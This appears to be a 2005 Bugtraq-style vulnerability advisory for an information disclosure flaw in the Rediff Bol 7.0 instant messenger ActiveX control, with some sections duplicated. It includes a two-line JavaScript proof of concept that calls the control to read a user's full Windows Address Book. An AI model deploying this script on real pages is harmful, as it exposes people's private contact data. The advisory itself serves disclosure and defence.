Rediff Bol Instant Messenger ActiveX Control Information Disclosure Vulnerability
BID:14740
Info
Rediff Bol Instant Messenger ActiveX Control Information Disclosure Vulnerability
| Bugtraq ID: | 14740 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 05 2005 12:00AM |
| Updated: | Sep 05 2005 12:00AM |
| Credit: | Discovered by Gregory R. Panakkal. |
| Vulnerable: |
Rediff Bol 7.0 |
| Not Vulnerable: | |
Discussion
Rediff Bol Instant Messenger ActiveX Control Information Disclosure Vulnerability
Rediff Bol Instant Messenger is prone to an information disclosure vulnerability. A malicious ActiveX control could allow an attacker to obtain the contents of a vulnerable user's Windows Address Book.
Rediff Bol Instant Messenger is prone to an information disclosure vulnerability. A malicious ActiveX control could allow an attacker to obtain the contents of a vulnerable user's Windows Address Book.
Exploit / POC
Rediff Bol Instant Messenger ActiveX Control Information Disclosure Vulnerability
The following script was provided:
[script]
var Obj = new ActiveXObject("Fetch.FetchContact.1");
alert(Obj.FullAddressBook(0,"","",""));
[/script]
The following script was provided:
[script]
var Obj = new ActiveXObject("Fetch.FetchContact.1");
alert(Obj.FullAddressBook(0,"","",""));
[/script]
Solution / Fix
Rediff Bol Instant Messenger ActiveX Control Information Disclosure Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Rediff Bol Instant Messenger ActiveX Control Information Disclosure Vulnerability
References:
References:
- Rediff Bol 7 exposes WAB (Gregory R. Panakkal)
- rediff Homepage (rediff.com)